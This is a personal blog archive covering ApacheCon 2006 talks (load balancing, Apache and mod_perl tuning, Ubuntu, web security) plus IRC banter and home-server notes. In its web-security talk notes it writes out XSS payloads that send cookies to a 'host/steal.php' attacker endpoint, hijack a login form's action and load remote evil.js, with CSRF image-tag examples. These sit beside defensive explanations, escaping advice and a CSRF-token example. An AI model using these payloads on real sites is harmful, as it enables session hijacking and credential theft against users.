
After an immensely satisfying, but tiring five days of conference, thanks were made to all the organisers. People were reminded that skycon and further apachecon events were coming up. Some free google merchandise was thrown at the crowd and we all went back to watching the Germany Vs Argentina match on the web, which is currently drawing 1-1 in extra time.
The Papers and Session material are (or will be) available online.
posted at: 18:17 | path: /technical | permanent link to this entry
Laura Thomson (OmniTI) presented "More of a rant and less of a technical talk" - it being Friday evening :-)
Firstly, frameworks - they're largely buzzwords and, since there's no dominant paradigm, they tend not to be a huge help with maintainability. Having a clear, simple architecture that's easy to add to, easy to explain to new developers and easy to remember now and in two or five years' time is best.
Be careful of the dubious merits of DB abstraction layers. They can be slow and cumbersome - and changing the PHP code to change database is most likely not going to be the most difficult part of the migration. Do use PDO, which is a standard for data access abstraction and standardise on the use of prepared statements.
Design for security
Sander Temme
Most websites that handle more than a moderate amount of traffic, or are responsible for generation of revenue, should probably think about scalability and reliability. These are good things to have, but cost money.
The reality is that moving parts break: hard disks, fans, hard disks, power supplies and HARD DISKS are all prone to failure. Hard disks are not all born equal - buy good ones with reliability and the longest warranty. Mirror disks, use RAID - and remember, RAID will not help if you're not notified of failures. Redundant power supplies are great, especially if they're plugged into different circuits.
You can load balance using various techniques, e.g. F5, Alteon, DNS Round Robin, Cisco, Juniper, etc. DNS Round Robin is the cheapest and simplest, but also the most prone to failure because clients cache DNS info - so if a server fails, any clients with its IP address will continue to fail.
Network Load Balancer is a technology that comes with Windows Server 2003 - it's application independent so should work with Apache. It works with up to 32 hosts and all hosts in the cluster assume the same IP and MAC address. NLB makes the decision as to which server answers the TCP handshake, which determines which host is responsible for the connection.
Linux Virtual Server is an IP virtual server module that comes with the Linux kernel.
Apache mod_proxy and mod_balance can be used to load balance. This includes some clever stuff that you can do with Jakarta and Tomcat using IP Multicast, which means that if the Apache load balancer detects that a machine has died, the connection will stay up and it will get another server to handle the request.
Sander demoed a mod_jk example which load balanced between 3 tomcat instances, displaying the debug logs as we went and killed things. Everything worked seamlessly. Note that your objects in your web applications must be serialisable, otherwise load balancing will fail with mod_jk. Many applications do not adhere to that and are not clusterable.
More information and slides at: people.apache.org
posted at: 16:49 | path: /technical | permanent link to this entry
Sander Temme
AllowOverride none for the best performance.
MaxClients to match the CPU performance. Generally CPU performance is the limiting factor nowadays, since memory is relatively freely available in today's servers.
server.xml, tune minProcessors, maxProcessors; use APR->Persistent connections and tune the JVM (heap, garbage collection, etc.)
For MySQL, note that it ships with multiple useful configurations: my-{small|medium|large|huge}.conf. Note that every child makes a DB connection for PHP and prefork. Tune the max_connections variable in my.cnf. Apache 2.2 now supports connection pooling, so one database connection can be shared between children.
ulimit -S -n `ulimit -H -n` which means that Apache sets the soft limit to the hard limit for open files. Make sure it's set to something sensible and to a value that will work on your server.
Colm MacCarthaigh (HEANet)
Colm presented this talk to a room bursting with people; extra chairs were brought in and
50,000 users is not a lot in terms of computing power today, so how do we make the webserver handle this many, and more?
.htaccess file enabled, Apache checks the requested directory, and every parent directory is checked for .htaccess files - for every request. This can really slow things down.
noatime since that saves a write for every hit. This can do anything up to double your filesystem performance. Increase the i-cache size. Try different block sizes on the filesystem.
William Rowe (Covalent Technologies) presented the new Apache 2.2.2 installer, now with SSL, that's available for Windows.
Apache and the toolset are distributed as a binary, since there's no expectation that a compiler will be available. Even with a compiler, it can be difficult to compile and build things like PHP.
The installer does all the things you might expect, including displaying the AFL, allowing some basic configuration information to be entered. Generally, it's recommended that you create a normal user (rather than guest) because it's a royal pain to make a guest user have enough of the exactly right permissions for things like PHP to run correctly. For convenience, a new service called Apache2.2 is created, which can be manipulated through the standard Services management console. Service dependencies work, so you can configure the Apache service to wait until something like Tomcat has started before starting.
IIS Side effect - if you configure IIS to bind to port 80 on one ethernet address, and you have more than one interface, it will bind to every adaptor it can find in the machine. How blessedly competent... *cough*
Crypt passwords are not supported on Windows, so be sure to use hashed passwords (MD5 or SHA1 for example) and, since we're trying to deprecate MD5, please try to move towards SHA1.
Before running Apache, we need to change the permissions for the logs/ directory and the proxy/ directories. This is where Apache wants to store logs and cached files respectively. Add write permissions for the user you created earlier.
The configuration files are broken into a small httpd.conf file, with includes pointing at files in the extra/ directory. This means that modules can be enabled and disabled simply by commenting out or uncommenting include lines. Remember to use / (forward slash) as the path delimiter, and quote whitespace in filenames. Apache configuration understands forward or backward slash in most cases, but things like mod_rewrite will need everything to be forward slash delimited.
The OpenSSL config file is not shipped with Apache 2.2.2 (promised that this will be fixed in 2.2.3) but you can pull the latest from the openssl website. Full details of this will be in the slide-set for this presentation (I will update the link to point directly at the slideset as soon as William has time to put it up.)
More information at:
Rich Bowen, after giving a talk on mod_rewrite earlier today, had the following 10 things your webserver can do that you might not yet know about. It should be noted that Rich is a mathematician, hence his excellent counting abilities.
Paul Fremantle had the following to say regarding Apache (the webserver) and Irish Music (the diddly-diddly stuff that's not a webserver, for the confused among you) and why they are alike:
So what is on Ken's belt? Well, in the 5 minutes allotted for an ApacheCon Lightning Talk, he managed to get through, and model for us, the following:
Cliff Schmidt presented an analysis of various different open source licenses. There are currently 58 approved OSI licenses, so there's quite a bit of ground to cover when it comes to this field of study.
I would have liked to blog more material, but the 4 hours covered so much, bouncing from topic to topic so fast, that any attempt to make a coherent set of notes would have been doomed to failure - and would have resulted in me missing the next three topics while I typed up the first.
I'll post a link to the slidesets when Cliff makes them available on t'internetwebsuperhighway.
And now - onwards to the lightning talks.
posted at: 18:18 | path: /technical | permanent link to this entry
I need to do a serious evaluation of the people I hang around with! From IRC today:
[11:49] seb bruce: is this "too much pepsi" bruce?
[11:58] bruce seb: I never drive pepsi on this side of the pond!
[11:59] seb bruce: but you did, on a bus from belfast, whilst waxing lyrical about peas.....
[12:00] seb .. or was it beans...
[12:00] seb i cant remember...
[12:01] bruce seb: twas coke _not_ pepsi, and I spoke about the inside of a rice-crispie, I believe.
Philippe Chiasson
We've seen that mod_perl can make your CGI code run a lot faster, without making any changes to the source. Let's look at how we can make things even faster by making some code changes to optimise things.
First, use mod_status and ab for benchmarking. Comparing apples with apples is important. When you have mod_perl installed, you can use Apache2::Status, which is the mod_perl equivalent. It has no overhead and comes with the mod_perl package, so you already have it and there's no disadvantage to having it configured on a production server (assuming you don't allow the world to access it.)
A useful method of looking at memory is GTop for perl, which only works on Linux systems, but usually comes with Gnome.
use GTop;
my $gtop = GTop->new;
my $proc_mem = $gtop->proc_mem($$);
for (qw(size vsize share rss)) {
    printf "%s => %d\n", $_, $proc_mem->$_();
}
PerlModule CGI
PerlModule DBI
...
DBI->install_driver('mysql');
CGI->compile(':all');
Use ModPerl::RegistryLoader() and call the handler($url, $filename) to pre-populate the Registry cache. Be very careful that the URL does match the file pointed at, otherwise you're putting dirty data in the cache and all bets are off. This means your script is in shared memory - so be careful, because if you change the code, every thread will have to reload the script and you'll have n copies of the script in memory (where n is the number of threads running.) Of course, the obvious way of getting around this is to restart the server so that the cache is pre-populated with the updated code.
handler() with the multiple URLs.
use Apache2::Const qw(OK DECLINED);
return OK;
use Apache2::Const -compile => qw(OK DECLINED);
return Apache2::Const::OK;
SetHandler perl-script means that lots of things are done for you: STDIN/STDOUT are tied, %ENV and @INC are saved/restored and %ENV changes are propagated. All of these things are done automatically, but if we don't need them (or are willing to work around them for performance gains) we can use SetHandler modperl which does none of these things. This means that it is NOT thread safe (since the environment is a per process value) and may leave HTTP environment variables on the environment. We have to be careful of security implications of this.
PerlOptions AutoLoad # Default. Disabling means that you MUST preload everything.
PerlOptions -GlobalRequest
PerlOptions ParseHeader
PerlOptions SetupEnv # Disable to give an almost empty environment.
Apache2::SizeLimit
# startup.pl
use Apache2::SizeLimit;
$Apache2::SizeLimit::MAX_PROCESS_SIZE = 12000;
$Apache2::SizeLimit::MIN_SHARE_SIZE = 6000;
$Apache2::SizeLimit::MAX_UNSHARED_SIZE = 5000;
$Apache2::SizeLimit::CHECK_EVERY_N_REQUESTS = 4;
# httpd.conf
PerlCleanupHandler Apache2::SizeLimit
More information on the sites mentioned in my earlier post on mod_perl.
Philippe Chiasson
After a comedy false start involving a picture of his new small child and the basics of how to install mod_perl 2.0, we got down to business.
mod_perl means you can save on CPU cycles, memory, money, time, effort (with Apache::* modules on CPAN) and probably a few other things too.
The CGI model:
ab -c1 -n50 http://blah/cgi-bin/hello.pl
LoadModule perl_module modules/mod_perl.so
Alias /perlrun /var/www/cgi-bin
#!/usr/bin/perl
use CGI;
my $q = new CGI;
print $q->header('text/plain');
$counter++;
print <<"EOF";
counted $counter
EOF
Since we don't initialise $counter, the mod_perl / Registry caches the $counter variable, so depending on which fork of apache you hit, you'll hit $counter, which will increment - so you'll get values greater than 1.
The simple solution to this is to use my $counter always.
my to create a variable, but action that variable in a subroutine from script-global scope, you may get funny effects similar to the previous example. This is because Registry uses 'subification' to convert each script into a subroutine. This means that subs in your scripts will be subroutines of subroutines, which can create a closure. A warning sign might be "Variable $counter will not stay shared at..." in logs. This effectively turns the $counter variable into a global attached to the subroutine.
Google are giving out the Alectralight flashing Google logos at ApacheCon, with the super-bright flashing colourful LEDs on them - and a fairly strong magnet on the back.
Thing #1: The warnings say "For external use only." hahahahahahahahahahahaha!
Thing #2: A friend of mine was just complaining to me about them because he got one yesterday, and the magnet on the back erased his hotel room keycard. hehehe ;-)
posted at: 10:29 | path: | permanent link to this entry
Chris Shiflett (OmniTI)
The name Cross Site Scripting comes from the original attack on Geocities - where a domain loaded in a frameset was able to affect content loaded from another domain, also in the frameset. It crossed sites and injected javascript. Browsers protect against this kind of vulnerability in framesets today, but there are other ways to do an equivalent type of thing.
Using PHP in the following context, you can inject any code which will run on the victim's machine.
<?php echo $_GET['user']; ?> ----->
http://blah/script.php?user=%3Cscript%3E... ----->
<?php echo '<script> ... ' ?>
With this, you can steal the cookie for the site being browsed by the user. Often session keys are stored in the cookies, which means you can now possibly hijack the user's session.
<script> document.location = 'http://host/steal.php?cookies=' + encodeURI(document.cookie); </script>
Cross Site Request Forgeries
How about using image loading to grab cookie information? You can hide the image by setting height and width of the image to zero, or using CSS to place the broken image underneath something else, making it invisible to the user.
<script>new Image().src = 'http://host/steal.php?cookies=' + encodeURI(document.cookie);</script>
How about stealing passwords by changing the action of the first form on a page? If the login form isn't the first form, a small bit of trial and error will find out which form it is. This can be made more transparent to the user by using more javascript to further send the same information on to the real server, so the user logs in. This is a basic MITM attack.
<script>document.forms[0].action = 'http://host/steal.php';</script>
How about making the javascript source look smaller - it's simple:
<script src="http://host/evil.js"></script>
Now you can insert as long a script as you like.
We also have to be careful about character encoding - here's why:
A browser such as IE will try to auto-detect the character encoding which means that escaping the output may fail.
<?php
$string = "<script>alert('XSS'); </script>";
$string = mb_convert_encoding($string, 'UTF-7');
echo htmlentities($string);
?>
Make sure that the charset declared in the response header (Content-Type: text/html; charset=UTF-8) and the charset passed to the escaping function (htmlentities($foo, ENT_QUOTES, 'UTF-8');) match.
AJAX is here to stay, and has inspired a new interest in javascript. This means that there are more javascript enabled browsers, more websites running javascript dependent content - and more and more people learning how to exploit XSS because it's more attractive to do so.
It can make XSS exploits more dangerous, because the AJAX security model depends on domain sandboxing.
Case study (CSRF)
A MySpace user, Samy, managed to get 3 million friend requests in 24 hours or so, resulting in the site having to be taken offline for some time to repair the damage.
A CSRF attack comes from the victim's computer, and follows all the rules for http requests. Generally, the victim already has an account so authentication is bypassed (since it's a valid user), and the request will be from valid IP space, etc., etc.
<form action="buy.php" method="post">
<input type="hidden" name="isbn" value="1234567" />
</form>
First check to see if the buy.php script will accept GET as well as POST.
If so, set up an image as <img src="http://host/buy.php?isbn=1234567" /> ---->
GET /buy.php?isbn=1234567 HTTP/1.1
Host: host
Cookie: PHPSESSID=1234
So now the attacker has got the session ID for the user's session.
If you don't allow GET, there's still a way. Create the form with width and height 0 and set the layer as transparent in CSS.
MySpace use a one-time token to ensure that any forms that take action have a unique value. This eliminates all the examples shown so far. But XSS can work around the security model for AJAX. The way around it is to make the user's browser request the form, but have the response returned to the attacker rather than the victim. The MySpace worm used AJAX to discover the token.
Samy put the AJAX code in his profile, so anyone who viewed his page was added as his friend. He then added the feature that it would also add the code to their profile - so anyone who then viewed their pages would be added as his friend. This led to an exponential growth in friend requests for Samy. I found a technical description here.
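One way to implement the one-time form token described above, as an added example that is not code from the talk or from MySpace. The function names, the 'buy' form id and the 15-minute lifetime are assumptions, and $session and $post stand in for $_SESSION and $_POST so the script runs from the command line.

```php
<?php
declare(strict_types=1);

// Added example, not from the talk. $session stands in for $_SESSION and
// $post for $_POST so the flow can be run from the command line.

const CSRF_TTL = 900; // token lifetime in seconds (assumed value)

// Create a fresh random token for one form and remember it server-side.
function csrf_issue(array &$session, string $formId, ?int $now = null): string
{
    $token = bin2hex(random_bytes(32));
    $session['csrf'][$formId] = ['token' => $token, 'issued' => $now ?? time()];
    return $token;
}

// Hidden field to embed in the form, escaped like any other output.
function csrf_field(string $token): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlentities($token, ENT_QUOTES, 'UTF-8') . '" />';
}

// True only for a POST that carries the unexpired token issued for this form.
function csrf_check(array &$session, string $formId, string $method, array $post, ?int $now = null): bool
{
    // State-changing actions accept POST only, so <img src="buy.php?..."> fails here.
    if ($method !== 'POST') {
        return false;
    }
    $entry = $session['csrf'][$formId] ?? null;
    $sent = $post['csrf_token'] ?? null;
    if ($entry === null || !is_string($sent)) {
        return false;
    }
    if (($now ?? time()) - $entry['issued'] > CSRF_TTL) {
        unset($session['csrf'][$formId]); // expired: force a fresh form
        return false;
    }
    // Constant-time comparison avoids leaking the token through timing.
    if (!hash_equals($entry['token'], $sent)) {
        return false;
    }
    unset($session['csrf'][$formId]); // one-time: a replay finds no token
    return true;
}

// Constructed requests against the buy.php form from the text.
$session = [];
$token = csrf_issue($session, 'buy', 1000);
echo csrf_field($token), "\n";

$cases = [
    'forged GET via image tag'   => ['GET',  ['isbn' => '1234567'], 1010],
    'forged POST, no token'      => ['POST', ['isbn' => '1234567'], 1010],
    'forged POST, guessed token' => ['POST', ['isbn' => '1234567', 'csrf_token' => str_repeat('0', 64)], 1010],
    'genuine POST'               => ['POST', ['isbn' => '1234567', 'csrf_token' => $token], 1020],
    'replay of genuine POST'     => ['POST', ['isbn' => '1234567', 'csrf_token' => $token], 1030],
];
foreach ($cases as $label => [$method, $post, $now]) {
    $ok = csrf_check($session, 'buy', $method, $post, $now);
    printf("%-28s %s\n", $label, $ok ? 'accepted' : 'rejected');
}
```

The token only stops requests forged from other sites. As the talk notes, script injected through XSS runs inside the site itself and can read the token, so output escaping is still required.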
[filter] --> [business logic] --> [escape] -->
By escaping the output carefully, we can remove the issues associated with XSS.
Here's an example of how you can put all your clean data in an array. Worst case, an array element is missing since it was dirty in some way, so this needs to be handled...
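<?php
$clean = array();
// Accept the name only if it is present, a string, and purely alphabetic.
if (isset($_POST['name']) && is_string($_POST['name']) && ctype_alpha($_POST['name'])) {
    $clean['name'] = $_POST['name'];
} else {
    /* Error */
}
?>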
Let's use 'defense in depth' by still quoting the output, even though we've cleaned up the input. This has been shown to be valuable, because sometimes we make mistakes.
<?php
/* Content-Type: text/html; charset=UTF-8 */
$html = array();
// Clean the data...
// Escape for HTML output, using the same charset as the Content-Type above.
$html['name'] = htmlentities($clean['name'], ENT_QUOTES, 'UTF-8');
echo "<p>Welcome {$html['name']}.</p>";
?>
More information available at:
Christian Wenz
This discussion proved so popular, with people spilling into the aisles of the room, that this presentation was moved to the larger business track room, displacing it. Some minor reshuffling later, we settled in to watch Christian's presentation.
Where should people be taught about security in programming? On average, almost one vulnerability per day is detected in OSS.
With forms that accept arbitrary text, javascript code can be inserted. script tags can be inserted and cookies can be grabbed by http://loser.tld/? + document.cookie; or similar. This means that the cookie can be stolen without the user knowing. XSS has been around on the web for a long time now.
With AJAX / XMLHTTP Request a whole new set of possibilities opens up. There is a security model in place (same domain) but do you trust your browser to enforce this?
Escaping <, >, &, ", ' does the trick, but be careful of the charset. Stripping script tags does NOT do the trick, because of pseudo URLs.
With databases, SQL Injection can allow access to the data - including private data. Some examples were given of basic SQL injection attacks. This included a demonstration of DoS by making an injection attack benchmark a UNION SELECT which generated md5 hashes of random data.
A subjective talk by Brian W. Fitzpatrick, from Google. The 'W' is to distinguish him from the band of the same name, he assures us :-)
To determine whether a project is successful as an OSS project, first you have to define success. Some companies seem to think that making their software Open Source will provide a huge amount of publicity. This may not be the case, unless they do it right. Trying to use OSS to make other people write the code for you, or maintain it, is almost always doomed to failure.
A successful project:
Mark Shuttleworth kicked off the business track of ApacheCon '06 with an introduction to Ubuntu, its ideals and how Canonical fits into the whole Open Source initiative.
Ubuntu is working at making a great product, with Canonical as the anchor-tenant providing quality assured support. It's a meritocratic dictatorship (possibly?) rather than a democracy : Canonical is about finding great people and publicising their works. Forks are actively encouraged, supporting the concept of genuine freedom and flexibility.
We're on a race to zero licensing fees, with Ubuntu merely being slightly ahead of the curve at its price tag. Certification and Standard compliance is gradually coming, as is internationalisation and localisation. This is a slow process, but is starting to happen.
We're still limited as we won't ship non-free software, so until things like Harmony happen, there's a limited amount of support for things like a J2EE environment, etc.
Try to stay close to upstream distributions, so we're facing the same issues at the same time. This means that bugs can be fixed once and once only. Work is published early and often, so feedback can be gathered. Services like launchpad.net allow work to be submitted, tracked and ensure there's the best chance of finding, tracking and solving bugs in the right place. If this means pushing materials upstream, and that's the right thing to do, launchpad makes that easy (or at least trackable and manageable.)
Ubuntu supports rebranding. People like to take a product and 'own' it - this means that we might see Ubuntu in lots of countries in the future, but it might be called something other than Ubuntu. There's already a family of distributions, Kubuntu, Edubuntu, etc. Many more are envisaged.
Getting involved is what it's all about.
Dapper is the first release with guaranteed support, including a financial commitment that support will continue even if Canonical shuts down. Three years on the desktop and five years on server distributions means that Ubuntu is being put forward as enterprise ready.
Ubuntu is going from strength to strength. Pretty much every hand in the room went up when Mark asked who used or had used the distro. Serious financial commitment to support over 3 and 5 years respectively means that there's no reason for industry to be scared that they'll be left with a broken infrastructure and no support. We just need to keep making sure that Bug #1 remains the top priority.
posted at: 11:21 | path: /technical | permanent link to this entry
Mark Shuttleworth introduced his view on F/OSS and whether the battle for the desktop has been won. The presentation tools used were Ubuntu and OpenOffice - which I'm only aware of because he switched applications during the presentation. His talk consisted of a number of points, detailed below. (Again, apologies for being brief, I was typing as he spoke.)
#13 : Pretty is a FEATURE
"It takes ten times as long to create great software that looks good and is easy to use, as it is to just produce great software."
#12: Consistent PACKAGING
This is a solved problem, but leadership is required from the various leaders of the various distributions - perhaps now is the time to standardise and work on reducing the fragmentation.
#11: Simplified LICENSING
It's obvious really... isn't it? ;-)
#10: Pervasive PRESENCE
We're getting to the stage in software and particularly in operating systems where things should 'just work.'
#9: Pervasive SUPPORT
People still have a concept that Linux is not supported. We need to transform the 'grass-roots' support into a pervasive support structure that everyone can grasp and utilise.
#8: Govaritye PA RUSSKI
Localisation is a huge barrier to adoption, not necessarily by the IT professionals, but by the 5 billion other potential computer users.
#007: Great GADGETS
Linux is getting to lots of cool places, including smart phones, PDAs, the $100 laptop, etc. But when you look at how it's done, there's a huge amount of fragmentation in implementations and functionalities. We need to generate some championship and leadership to drive excitement into the market about this. Penetration of mobile phones on the continent is an order of magnitude greater than fixed line penetration - so there's a HUGE customer base.
#6: Sensory IMMERSION
We want to define a future which is engineered on free software, which makes voice available on the desktop (VoIP, etc.) along with video - so that people can immerse themselves in their desktop.
#5: Getting it TOGETHER
We have an opportunity to leapfrog the commercial collaboration products and provide the tools and environment so that the software can truly enable people to become more productive. E-mail, pervasive connectivity and revision control are some of the tools we should look at bringing to the desktop and office environment. Wouldn't it be nice to be able to invite some other person into your desktop to work with you?
We've already seen some good things happening regarding this in the software world - for example, when Firefox became as good as the commercial alternatives, we saw an explosion in development and a huge wealth of external development, plugins, etc. We want to bring this to the desktop.
#4: Plan, execute, DELIVER
We're good at planning and pretty good at executing, but perhaps not so good at the delivery part. F/OSS tends to be built by large numbers of fragmented communities and we need to communicate to the community what's going on, what has been done, what needs to be done and who is responsible for that. This should give a good idea of when things might be ready.
#3: The extra DIMENSION
Mac OS X set the benchmark and it looks like Microsoft will take the lead with Windows Vista. We need to bring tools together and provide new ways of working to make people want to use Linux on the desktop.
#2: Granny's New CAMERA
Linux is already a great desktop for a power user - and is excellent for producing thousands of replicated terminals, or office 'standard configuration' machines. What we need to work on is the middle-ground - the home PC. When Granny plugs in her camera, we want to allow her to install the driver for her camera, or do it automatically, so that she perceives that the camera 'just works.'
#1: Keeping it FREE
The freedom is what drives many of the developers. Keeping it free is Mark Shuttleworth's number one priority and he wants the same software available to a millionaire in London and a kid growing up in a shanty town in South Africa.
Solving BUG #1 is the top priority.
posted at: 10:41 | path: /technical | permanent link to this entry
From the annals of Steve-Teh-Wonder-Cook(tm)...
[19:18] diamond huh. burning smell. that's not good.
[19:19] atlas Are you "cooking" again?
[19:19] diamond atlas: you mean pouring milk into a bowl of cereal? no, not yet.
[19:20] atlas Hmm. I've no idea what it could be then
[19:21] diamond found the issue. luisa was on fire in the kitchen.
[19:22] atlas How inconsiderate of her.
[19:22] diamond yeah. i'm ringing the immigration fire brigade to get her put out.
Theo Schlossnagle (OmniTI) spoke about a solution for serving a massive amount of largely static images.
Why pay Akamai or NetApp lots of money for bandwidth, network infrastructure or webcache devices, when you can roll your own?
Peer-based HA caching with something like Apache + mod_proxy (Reverse proxy + caching) might work well. There are some caveats - such as other people's caches, which might not respect cache directives.
The example given was a three-site HA solution. Finding the 'closest' image server was achieved through using local DNS servers, colocated with the image servers, and Anycast (all the DNS servers have the same IP address and BGP takes care of finding out which is the 'closest' DNS server). DNS uses UDP, which means that it's safe to use Anycast for serving - however, the image servers would use TCP connections, which will not work if the internet topology/routing changes in the middle of a session.
So if you have 3 DNS servers, each with the same IP address in 3 geographically diverse locations, 3 servers ready to serve static image content, your own AS for BGP routing and a large amount of static image content - you can use F/OSS software and commodity hardware to make a HA/LB solution that will handle an enormous load.
What about distributed reliable logging? Something like a spread patch to syslog-ng allows logs to be written in 'real' time to multiple servers, reliably.
Blogs can benefit hugely from caching. Something like memcached might work for a read-heavy, write-light dataset. User preferences can be stored in user cookies which will provide all the nodes you ever need, along with all the resilience you'll ever want. If someone loses their cookie (or deletes it) you can just look up their preferences in your database and regenerate their cookie - if their cookie gets corrupted or their browser breaks, they only remove service from themselves.
Apologies for the terseness of this article, but information was coming hard and fast - and I can only typo at a certain rate ;-)
posted at: 16:39 | path: /technical | permanent link to this entry
After a largely uneventful, though delayed, flight, I arrived in Dublin. Immigration was less crowded than usual, the walk from the RyanAir terminal to the main airport building was longer than usual and the arrival of my bags was more prompt than usual. I guess it all averages out in a woefully uninteresting manner though. In a similarly uninteresting vein, Dublin's weather had returned to the bleak grey dampness to which I have become accustomed, leaving my sunglasses to dangle forlornly from my collar.
After topping up my phone and calling one of the ApacheCon organisers to see where best to meet up with them, I did my usual inept dance of trying to exchange all Sterling money on my person for Euro - failing utterly to complete this by the time I had to pay for a bus ticket. I now have an unnerving weight of Euro shrapnel (coins) in my pocket to attempt to get rid of over the next few days.
HEANet are generously providing internet connectivity for the event, but I've been warned that this means there's a collection of wireless APs to be configured and installed. I suspect this will keep me occupied for at least a chunk of the remaining afternoon. It also means there's a good chance that I (and probably many like-minded, but superior writers) will be able to keep a mostly up to date blog of the event as it happens. I guess you, dear reader, will find out whether this happens or not. ;-)
posted at: 16:05 | path: /technical | permanent link to this entry
Having only just returned from Ireland, I'm flying back to Dublin again to attend ApacheCon 2006. It should be a most interesting opportunity to hear some differing views from various industry sources on the future of Apache, web applications and Open Source Software in general. I'm certainly looking forward to it.
I'll be blogging parts of the ApacheCon 2006 event here (and on skynet) as the event unfolds.
posted at: 08:37 | path: /technical | permanent link to this entry
It is the way of things... (from poisonedminds.com)

posted at: 01:05 | path: /lotd | permanent link to this entry
I attempted to do some exercise earlier today, only to be turned away by a large sign on the door of the gym stating that it was closed until further notice. Apparently the company has gone bust and the gym is to be shut down permanently. This sucks! :-(
Looks like I'll have to find some alternate means of burning off the excess lard which I consume on a regular basis.
posted at: 03:16 | path: | permanent link to this entry
I finally managed to find the time to investigate the fate of neutron's disk array, the failing of which caused the whole machine to die unceremoniously a few days back. Turns out that it was a simple disk failure, which was simple to isolate and fix due to the disks being mounted in removable caddies. With my data stored as RAID5, the single disk failure was not a problem...
However: neutron is a cheap, IDE based system and this failure highlighted the differences between it and a commercial, carrier grade server. Although I lost no data, neutron would not successfully boot with the failed disk on the IDE bus.
The rebuild from degraded state of the large RAID5 array, upon which my data sits, is almost completed now:
eason@neutron:~$ cat /proc/mdstat
Personalities : [raid1] [raid5]
md1 : active raid5 hda2[5] hde2[0] hdg2[4] hdb2[3] hdf2[1]
976623104 blocks level 5, 64k chunk, algorithm 2 [5/4] [UU_UU]
[================>....] recovery = 81.0% (197838464/244155776) finish=34.5min speed=22349K/sec
I would just like it stated, for the record, that I win - purely on the basis that I purchased a box of 18 assorted fruit tarts at Tescos earlier. Mmmmmmm - jammy, sugary goodness!
posted at: 20:39 | path: | permanent link to this entry
Dilbert sometimes features a character that must always be bigger and better than everyone else. He makes me laugh. Sometimes, for completely different reasons, real-life people make me laugh too...
[10:43] <m1> gah. i've just spent the past half hour crimping the wrong connector pins onto ribbon cable :(
[10:44] <diamond> fun
[10:44] <diamond> i stood up there a minute ago, the headphones snagged on the arm of the chair causing the mp3 player to be yanked off the table, and then i headbutted the table while retrieving the mp3 player. it was not a happy moment
[10:44] <zoney> Ouch!
[10:45] <diamond> i then sat very still for a few moments to avoid making things worse, then slowly backed away from anything dangerous
[10:45] <zoney> diamond: still, you didn't electrocute yourself, so that's good
[10:45] <diamond> 'strue
From the ILUG mailing list, Padraig Brady had the following useful tips (repeated here so that I can find them and maybe not forget them):
Following on from my previous mail about finding cruft on a debian system with:

    (cat /var/lib/dpkg/info/*.list ; find / -type f ) | LANG=C sort | uniq -u

I find set operations like that quite common on the command line:

For unsorted files:

    LANG=C sort file1 file2 | uniq           #Union
    LANG=C sort file1 file2 | uniq -d        #Intersection
    LANG=C sort file1 file1 file2 | uniq -u  #Difference
    LANG=C sort file1 file2 | uniq -u        #Symmetric Difference

For sorted files:

    LANG=C comm file1 file2 | sed 's/^\t*//'     #Union
    LANG=C comm -12 file1 file2                  #Intersection
    LANG=C comm -13 file1 file2                  #Difference
    LANG=C comm -3 file1 file2 | sed 's/^\t*//'  #Symmetric Difference

Note the LANG=C for speed as we're not interested in the actual order of the items.

Padraig.
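An added example (not part of the mailing-list post): the cruft one-liner quoted above is a symmetric difference, so it reports package-owned paths that are absent from the file listing alongside files no package owns. The sketch below separates the two with `comm`; the sample paths and the function names `make_sample`, `sym_diff`, `setop`, `unowned` and `missing` are constructed for illustration.

```shell
#!/bin/sh
# Added example. All paths and function names are constructed for illustration.

# Constructed inputs: "owned" mimics concatenated dpkg .list files (which list
# directories as well as files); "ondisk" mimics `find / -type f` output.
make_sample() {
    dir=$(mktemp -d)
    printf '%s\n' /usr /usr/bin /usr/bin/tool /usr/bin/tool /etc/tool.conf > "$dir/owned"
    printf '%s\n' /usr/bin/tool /usr/local/bin/dropped /tmp/x > "$dir/ondisk"
    echo "$dir"
}

# The one-liner's logic: lines occurring exactly once across both inputs,
# i.e. a symmetric difference, so it mixes two different findings.
sym_diff() {
    cat "$1" "$2" | LC_ALL=C sort | uniq -u
}

# comm needs both inputs sorted in the collation comm itself uses; LC_ALL
# overrides LANG and every other LC_* variable, so set it on each command.
setop() {  # setop COMM_FLAGS FILE1 FILE2
    a=$(mktemp); b=$(mktemp)
    LC_ALL=C sort -u "$2" > "$a"
    LC_ALL=C sort -u "$3" > "$b"
    LC_ALL=C comm "$1" "$a" "$b"
    rm -f "$a" "$b"
}

# On disk but claimed by no package: the list worth reviewing.
unowned() { setop -13 "$1" "$2"; }

# Claimed by a package but absent from a files-only listing: deleted files,
# plus every directory the package database records.
missing() { setop -23 "$1" "$2"; }

d=$(make_sample)
echo "symmetric difference:"; sym_diff "$d/owned" "$d/ondisk"
echo "unowned:";              unowned  "$d/owned" "$d/ondisk"
echo "missing:";              missing  "$d/owned" "$d/ondisk"
rm -rf "$d"
```

On a real system the `missing` list is dominated by directories, because the package file lists include them while `find / -type f` does not.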
Looks like I've had my first hard disk failure in Neutron. I think it might actually be the disk rather than the disk controller this time - but who can say...
Of course, the disk that's failed is not one of the ones in the external caddies, which makes replacing it slightly more fiddly than I'd like - oh well. Tomorrow I'll poke at it more and see if my RAID5 setup has managed to save my data.
posted at: 02:25 | path: /technical | permanent link to this entry
I recently passed through Shannon airport and had cause to look up some train times for my destination. Fortunately, I had an Apple iBook with me and the Airport proudly proclaims that free Wireless internet connectivity is available. To cut a long story short, despite three attempts at getting some kind of connection to the net, registering 3 times and wasting a good 20 minutes of my life that I want back, please, I gave up on the whole thing.
I remember using wireless internet at the airport before - and it was good. I could log in, check my mail or open an IRC client and converse with a few friends and let them know that I was about to jump on a plane to some not-so-exotic destination. This was all good. Then someone got ideas and additional features, I suspect... Features are almost always a bad thing, I've found. People wanting to add features to something that already just works should consider the impact of this very, very carefully. People who only test a wireless connection using Windows and Internet Explorer, with Javascript enabled, and cookies accepted from everywhere - including places that are not the originating site, and assume everyone uses webmail and/or can access their e-mail through port 80 - should be taught a few lessons about how the internet really works, possibly with the aid of a swift introduction to my LART.
For the benefit of anyone else wishing to set up a service that they're hoping people will use briefly, especially with limited time available to them, here's a few tips on how to make it accessible:
Over the past few days, Róisín the 'almost five-year-old' has uttered:
While on an airplane flying at somewhere approaching 30,000 feet:
"Why is the sky up here?"
Referring to her new Disney Beauty And The Beast book:
Róisín: "I'm Belle!"
Sínéad (in a teasing fashion): "I'm Belle!"
Me: (Maintaining the 'I'm Spartacus' theme): "I'm Belle!"
Róisín (upset): "You're NOT Belle! Daddies are beasts!"
